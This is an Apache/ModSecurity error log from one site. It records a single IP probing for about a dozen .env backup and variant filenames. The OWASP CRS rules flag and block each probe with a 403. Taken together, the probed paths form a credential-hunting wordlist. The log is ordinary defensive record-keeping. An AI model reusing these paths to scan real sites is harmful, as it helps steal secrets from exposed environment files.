[Tue May 27 15:05:56.959993 2025] [:error] [pid 3435313] [client 185.146.232.218:44702] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_local"] [unique_id "aDW4tBc-bm3P_kMSA92eHwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:56.960335 2025] [:error] [pid 3435313] [client 185.146.232.218:44702] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_local"] [unique_id "aDW4tBc-bm3P_kMSA92eHwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:56.960501 2025] [:error] [pid 3435313] [client 185.146.232.218:44702] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_local"] [unique_id "aDW4tBc-bm3P_kMSA92eHwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:02.745313 2025] [:error] [pid 3435308] [client 185.146.232.218:16662] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_back"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_back"] [unique_id "aDW4uhpsgQ-cVRubiE_pIgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:02.745712 2025] [:error] [pid 3435308] [client 185.146.232.218:16662] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_back"] [unique_id "aDW4uhpsgQ-cVRubiE_pIgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:02.745924 2025] [:error] [pid 3435308] [client 185.146.232.218:16662] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_back"] [unique_id "aDW4uhpsgQ-cVRubiE_pIgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:11.268441 2025] [:error] [pid 3434643] [client 185.146.232.218:30178] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_bk"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_bk"] [unique_id "aDW4wzcx-eYxvKPm3wqRGQAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:11.268783 2025] [:error] [pid 3434643] [client 185.146.232.218:30178] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_bk"] [unique_id "aDW4wzcx-eYxvKPm3wqRGQAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:11.268966 2025] [:error] [pid 3434643] [client 185.146.232.218:30178] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_bk"] [unique_id "aDW4wzcx-eYxvKPm3wqRGQAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:17.953606 2025] [:error] [pid 3435307] [client 185.146.232.218:36642] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_docker"] [unique_id "aDW4yf8iIWre8jY-cNxR1wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:17.953977 2025] [:error] [pid 3435307] [client 185.146.232.218:36642] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_docker"] [unique_id "aDW4yf8iIWre8jY-cNxR1wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:17.954152 2025] [:error] [pid 3435307] [client 185.146.232.218:36642] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_docker"] [unique_id "aDW4yf8iIWre8jY-cNxR1wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:22.977446 2025] [:error] [pid 3435317] [client 185.146.232.218:36650] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_production"] [unique_id "aDW4zn4CeMAvTJAIhKuk2AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:22.977792 2025] [:error] [pid 3435317] [client 185.146.232.218:36650] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_production"] [unique_id "aDW4zn4CeMAvTJAIhKuk2AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:22.977974 2025] [:error] [pid 3435317] [client 185.146.232.218:36650] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_production"] [unique_id "aDW4zn4CeMAvTJAIhKuk2AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:36.512390 2025] [:error] [pid 3434646] [client 185.146.232.218:14172] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_development"] [unique_id "aDW43ABjkyyU9gihc4sPAQAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:36.512738 2025] [:error] [pid 3434646] [client 185.146.232.218:14172] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_development"] [unique_id "aDW43ABjkyyU9gihc4sPAQAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:36.512908 2025] [:error] [pid 3434646] [client 185.146.232.218:14172] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_development"] [unique_id "aDW43ABjkyyU9gihc4sPAQAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:47.561436 2025] [:error] [pid 3434642] [client 185.146.232.218:20382] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_new"] [unique_id "aDW45_oteRZm3UET_KXStAAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:47.561784 2025] [:error] [pid 3434642] [client 185.146.232.218:20382] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_new"] [unique_id "aDW45_oteRZm3UET_KXStAAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:47.561971 2025] [:error] [pid 3434642] [client 185.146.232.218:20382] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_new"] [unique_id "aDW45_oteRZm3UET_KXStAAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:53.846805 2025] [:error] [pid 3435311] [client 185.146.232.218:56354] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_live"] [unique_id "aDW47ccVU5YaHAERsMJjYQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:53.847140 2025] [:error] [pid 3435311] [client 185.146.232.218:56354] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_live"] [unique_id "aDW47ccVU5YaHAERsMJjYQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:06:53.847312 2025] [:error] [pid 3435311] [client 185.146.232.218:56354] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_live"] [unique_id "aDW47ccVU5YaHAERsMJjYQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:08.883777 2025] [:error] [pid 3435315] [client 185.146.232.218:58378] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_dev"] [unique_id "aDW4_IMZxRfo8GmAcSTjWAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:08.884140 2025] [:error] [pid 3435315] [client 185.146.232.218:58378] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_dev"] [unique_id "aDW4_IMZxRfo8GmAcSTjWAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:08.884375 2025] [:error] [pid 3435315] [client 185.146.232.218:58378] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_dev"] [unique_id "aDW4_IMZxRfo8GmAcSTjWAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:25.435510 2025] [:error] [pid 3435316] [client 185.146.232.218:42716] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_test"] [unique_id "aDW5DSw1TIthxW7dZehD5wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:25.435841 2025] [:error] [pid 3435316] [client 185.146.232.218:42716] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_test"] [unique_id "aDW5DSw1TIthxW7dZehD5wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:25.435986 2025] [:error] [pid 3435316] [client 185.146.232.218:42716] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_test"] [unique_id "aDW5DSw1TIthxW7dZehD5wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:40.685703 2025] [:error] [pid 3435313] [client 185.146.232.218:64448] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_old"] [unique_id "aDW5HBc-bm3P_kMSA92eIAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:40.686066 2025] [:error] [pid 3435313] [client 185.146.232.218:64448] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_old"] [unique_id "aDW5HBc-bm3P_kMSA92eIAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:40.686262 2025] [:error] [pid 3435313] [client 185.146.232.218:64448] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_old"] [unique_id "aDW5HBc-bm3P_kMSA92eIAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:48.802688 2025] [:error] [pid 3435308] [client 185.146.232.218:51010] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_bak"] [unique_id "aDW5JBpsgQ-cVRubiE_pIwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:48.803043 2025] [:error] [pid 3435308] [client 185.146.232.218:51010] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_bak"] [unique_id "aDW5JBpsgQ-cVRubiE_pIwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:07:48.803216 2025] [:error] [pid 3435308] [client 185.146.232.218:51010] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_bak"] [unique_id "aDW5JBpsgQ-cVRubiE_pIwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:04.144765 2025] [:error] [pid 3434643] [client 185.146.232.218:49886] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envnew"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envnew"] [unique_id "aDW5NDcx-eYxvKPm3wqRGgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:04.145106 2025] [:error] [pid 3434643] [client 185.146.232.218:49886] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envnew"] [unique_id "aDW5NDcx-eYxvKPm3wqRGgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:04.145266 2025] [:error] [pid 3434643] [client 185.146.232.218:49886] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envnew"] [unique_id "aDW5NDcx-eYxvKPm3wqRGgAAAAE"], referer: https://economiasolidale.38121.it/
